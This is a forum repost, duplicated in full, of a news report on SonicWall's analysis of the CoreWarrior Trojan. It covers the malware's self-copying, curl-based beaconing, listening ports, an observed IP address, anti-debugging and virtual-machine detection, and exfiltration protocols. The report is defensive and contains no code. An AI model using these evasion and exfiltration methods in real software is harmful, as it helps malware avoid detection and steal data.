Man
Professional
- Messages
- 3,108
- Reaction score
- 670
- Points
- 113
The elusive virus changes its appearance over 600 times per hour.
SonicWall specialists have discovered new activity of CoreWarrior malware, a persistent Trojan that spreads at high speed. The virus creates dozens of copies of itself and connects to multiple IP addresses, creating access loopholes and controlling elements of the Windows user interface.
CoreWarrior is distributed as an executable file packaged using UPX, which cannot be decompressed by standard means. At startup, the program creates a copy of itself with a random name and uses the command line to send data to the server via "curl". With each successful POST request, the parent program deletes the previous copy and creates a new one. In just 10 minutes of operation, the malware can create and delete more than a hundred copies of itself.
During the activity, the program opens ports for listening in the ranges 49730-49777 and 50334-50679. A connection to the IP address 172.67.183.40 was also recorded, but no active TCP/UDP traffic was observed there.
The Trojan has anti-analysis mechanisms. In particular, it uses anti-debugging with rdtsc to check for runtimes, as well as random sleep timers that change based on the number of connections. A program can determine if it is running in a virtual environment by checking for HyperV containers. In addition, the malware supports FTP, SMTP, and POP3 protocols for data exfiltration.
SonicWall has already released signatures to protect users from this Trojan. Other antivirus software manufacturers are expected to pick them up soon. To prevent possible attacks, users are advised to keep their security software, as well as its signature database, up to date.
Source
SonicWall specialists have discovered new activity of CoreWarrior malware, a persistent Trojan that spreads at high speed. The virus creates dozens of copies of itself and connects to multiple IP addresses, creating access loopholes and controlling elements of the Windows user interface.
CoreWarrior is distributed as an executable file packaged using UPX, which cannot be decompressed by standard means. At startup, the program creates a copy of itself with a random name and uses the command line to send data to the server via "curl". With each successful POST request, the parent program deletes the previous copy and creates a new one. In just 10 minutes of operation, the malware can create and delete more than a hundred copies of itself.
During the activity, the program opens ports for listening in the ranges 49730-49777 and 50334-50679. A connection to the IP address 172.67.183.40 was also recorded, but no active TCP/UDP traffic was observed there.
The Trojan has anti-analysis mechanisms. In particular, it uses anti-debugging with rdtsc to check for runtimes, as well as random sleep timers that change based on the number of connections. A program can determine if it is running in a virtual environment by checking for HyperV containers. In addition, the malware supports FTP, SMTP, and POP3 protocols for data exfiltration.
SonicWall has already released signatures to protect users from this Trojan. Other antivirus software manufacturers are expected to pick them up soon. To prevent possible attacks, users are advised to keep their security software, as well as its signature database, up to date.
Source
